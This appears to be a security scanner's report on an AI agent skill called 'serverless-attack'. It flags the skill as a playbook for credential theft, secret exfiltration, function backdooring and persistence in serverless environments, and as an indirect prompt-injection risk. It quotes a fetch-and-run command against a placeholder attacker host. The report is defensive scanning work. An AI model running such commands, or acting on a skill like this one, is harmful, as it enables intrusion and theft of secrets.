serverless-attack

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). This skill explicitly instructs locating and extracting environment variables, hard-coded API keys, and temporary credentials for exploitation, which requires the agent to retrieve and potentially output secret values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This skill content is explicitly a malicious playbook: it provides step-by-step instructions to extract credentials, exfiltrate secrets, inject/overwrite serverless function code with backdoors, achieve remote code execution (RCE), perform layer/supply-chain hijacking, and persist tooling in runtimes—demonstrating clear intent to compromise and abuse serverless environments.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs downloading and inspecting/running content from external, untrusted URLs (e.g., references/lambda-techniques.md: curl -o lambda_code.zip "$CODE_URL" to fetch target function code and SKILL.md Phase 5: curl -o /tmp/fscan http://attacker.com/fscan), meaning the agent ingests third-party content that can influence subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains an explicit runtime command that downloads and executes remote code (curl -o /tmp/fscan http://attacker.com/fscan && chmod +x /tmp/fscan) — i.e., http://attacker.com/fscan (and related attacker.com callback URLs shown) are fetched at runtime and executed, which directly runs remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs writing and executing binaries in /tmp, modifying function code/layers (injecting backdoors), and otherwise performing actions that change the host/runtime filesystem and execute code, which directly pushes the agent to modify the machine's state.